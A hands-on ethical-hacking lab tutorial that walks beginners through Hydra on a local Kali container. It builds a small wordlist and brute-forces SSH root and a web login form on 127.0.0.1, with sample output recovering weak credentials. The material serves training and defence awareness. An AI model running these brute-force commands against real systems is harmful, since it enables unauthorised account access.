Kali Password Attacks with Hydra

Introduction

In this lab, you will learn the basics of ethical hacking using Kali Linux to explore password attack techniques with Hydra, a powerful tool for brute-force attacks. The focus is on understanding how such attacks work and why strong passwords and secure system configurations are essential. You will simulate attacks on SSH credentials and web logins within a controlled LabEx VM environment, ensuring a safe and legal space for practice. Through step-by-step guidance, you will create wordlists, execute brute-force attacks, and log results for analysis. All tasks are performed in a Kali Linux container, which is automatically set up for you, making this lab accessible even for complete beginners.

Setting Up the Environment and Installing Hydra

In this first step, you will prepare your working environment inside a Kali Linux container and install Hydra, the tool for our password attacks. When you open the terminal, you are automatically placed inside the Kali Linux container's shell, so no manual setup is needed.

First, confirm you are in the Kali Linux environment by checking the operating system details.

cat /etc/os-release

You should see output confirming you are running Kali Linux.

PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
VERSION_ID="2025.3"
VERSION="2025.3"
VERSION_CODENAME=kali-rolling
ID=kali
ID_LIKE=debian
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
ANSI_COLOR="1;31"

Next, update the package list to ensure you can fetch the latest software versions.

apt update

Now, install Hydra. Hydra is a versatile brute-force attack tool that supports numerous protocols. The -y flag automatically confirms the installation.

apt install -y hydra

After the installation completes, verify that Hydra is ready by displaying its help menu.

hydra -h

The output will show Hydra's version and usage syntax, confirming it is installed correctly.

Hydra v9.x (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] ...
...

Finally, start the SSH service that was pre-configured during the environment setup. This will provide us with a target for our brute-force attack simulation.

service ssh start

You can verify that the SSH service is running by checking its status.

service ssh status

You should see output indicating that the SSH service is active and running.

sshd is running.

You have now successfully set up your environment, installed Hydra, and started the SSH service for our attack simulation.

Creating a Wordlist for Brute-Force Attacks

A wordlist is a plain text file containing potential passwords that a tool like Hydra will use to attempt to gain access to a target. In this step, you will create a small, custom wordlist for our simulated attacks.

You will use the nano text editor to create a file named passwords.txt.

First, install the nano text editor.

apt install -y nano

Now, create the wordlist file.

nano passwords.txt

This command opens a new file in the nano editor. Type the following common passwords into the editor, with each password on a new line.

admin
password
123456
test
root

To save the file, press Ctrl+O, then press Enter to confirm the filename. To exit nano, press Ctrl+X.

Now, verify that the file has been created by listing the contents of the current directory.

ls

You should see passwords.txt in the output, confirming your wordlist is ready for use in the next steps.

passwords.txt

Performing a Successful Brute-Force Attack on SSH

Now you will use Hydra and your wordlist to perform a brute-force attack against the SSH (Secure Shell) service running on your local system. SSH is a common protocol for secure remote administration. During the environment setup, we configured an SSH server with a weak password that exists in our wordlist, making this a realistic demonstration of how such attacks work.

Execute the following command to start the brute-force attack.

hydra -l root -P passwords.txt ssh://127.0.0.1

Let's break down this command:

• -l root: This flag specifies a single username to test, which is root.
• -P passwords.txt: This flag tells Hydra to use the passwords.txt file as the source for passwords.
• ssh://127.0.0.1: This specifies the target service (SSH) and the target host (127.0.0.1).

Since we have configured the SSH server with the password root for the root user (which exists in our wordlist), Hydra will successfully find the credentials.

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking ssh://127.0.0.1:22/
[22][ssh] host: 127.0.0.1   login: root   password: root
1 of 1 target successfully completed, 1 valid password found

Congratulations! The attack was successful. Hydra found that the username root with password root provides valid access to the SSH service. This demonstrates how weak passwords can be easily discovered by brute-force tools.

Performing a Successful Brute-Force Attack on a Web Login Form

Next, you will perform an attack on a web login form. This is another common target for brute-force attacks. During the environment setup, we configured a simple Apache web server with a vulnerable login page that accepts the credentials admin:admin.

First, let's ensure the web server is running by starting it:

service apache2 start

Now run the following command to perform the web login attack.

hydra -l admin -P passwords.txt http-post-form://127.0.0.1/login.php:'user=^USER^&pass=^PASS^:F=Incorrect'

Let's examine the components of this command:

• -l admin: Specifies the username admin.
• -P passwords.txt: Uses your password wordlist.
• http-post-form://127.0.0.1/login.php: Specifies the target protocol and the actual login page we created.
• 'user=^USER^&pass=^PASS^:F=Incorrect': This is the core of the web attack module.
  • user=^USER^&pass=^PASS^: Defines the form fields. Hydra replaces ^USER^ and ^PASS^ with the credentials it is testing.
  • :F=Incorrect: Tells Hydra that a login attempt has failed if the word "Incorrect" is found in the server's response.

Since our web application is configured to accept admin:admin (which exists in our wordlist), Hydra will successfully find the credentials.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-02 01:33:09
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking http-post-form://127.0.0.1:80/login.php:user=^USER^&pass=^PASS^:F=Incorrect
[80][http-post-form] host: 127.0.0.1   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found

Excellent! The web attack was also successful. This demonstrates how Hydra can be adapted to target different services, including web applications with vulnerable login forms.

Logging Successful Brute-Force Attack Results

In this final step, you will learn to log the output of a successful Hydra attack. Logging is a crucial practice for documenting findings during a penetration test or security audit.

You will re-run the SSH attack from Step 3, but this time you will save the results to a file.

hydra -l root -P passwords.txt ssh://127.0.0.1 -o attack_log.txt

The new part of this command is:

• -o attack_log.txt: This flag instructs Hydra to save its output to the specified file, attack_log.txt.

The command will run and produce the successful attack results on the screen, and also create a detailed log file.

To view the contents of the log file, use the cat command.

cat attack_log.txt

The log file will contain a summary of the successful attack run, including the discovered credentials.

## Hydra v9.x run at 2025-09-02 01:33:36 on 127.0.0.1 ssh (hydra -l root -P passwords.txt -o attack_log.txt ssh://127.0.0.1)
[22][ssh] host: 127.0.0.1   login: root   password: root

Excellent! The log file clearly shows that Hydra successfully discovered the credentials root:root for the SSH service. This type of detailed logging is essential for:

1. Documentation: Keeping records of successful penetration tests
2. Reporting: Providing evidence to clients or management
3. Analysis: Reviewing attack patterns and success rates
4. Compliance: Meeting security audit requirements

You have now learned how to save the results of a Hydra attack, demonstrating both successful credential discovery and proper documentation practices in ethical hacking.

Summary

In this lab, you have successfully learned the fundamentals of ethical hacking by performing real password attacks with Hydra in a Kali Linux container. You started by installing Hydra and setting up vulnerable services (SSH and web servers), then created a custom wordlist containing weak passwords. Through hands-on experience, you successfully executed brute-force attacks against both SSH credentials and web login forms, witnessing how quickly weak passwords can be compromised. Finally, you learned to log attack results for proper documentation and analysis.

Key takeaways from this lab:

1. Weak passwords are easily compromised - Both root:root and admin:admin were quickly discovered
2. Multiple attack vectors exist - SSH services and web applications are common targets
3. Proper documentation is crucial - Logging results is essential for penetration testing
4. Defense awareness - Understanding attacks helps implement better security measures

These practical skills provide a solid foundation for understanding the real mechanics of brute-force attacks and demonstrate the critical importance of strong passwords, account lockout policies, and secure system configurations in defending against such attacks.